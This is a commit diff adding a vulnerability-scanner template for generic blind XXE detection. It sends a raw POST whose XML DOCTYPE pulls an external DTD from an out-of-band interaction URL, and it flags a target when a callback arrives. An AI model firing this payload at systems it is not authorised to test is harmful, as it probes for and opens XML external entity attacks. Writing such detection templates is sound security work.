Create generic-blind-xxe.yaml
parent
59b2aeda40
commit
c39f0e2077
|
@ -0,0 +1,32 @@
|
|||
id: generic-blind-xxe
|
||||
|
||||
info:
|
||||
name: Generic Blind XXE
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: xxe,generic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip,deflate
|
||||
Referer: {{BaseURL}}
|
||||
Content-Type: text/xml
|
||||
Content-Length: 112
|
||||
Connection: close
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
|
||||
<foo>&e1;</foo>
|
||||
redirects: true
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
Loading…
Reference in New Issue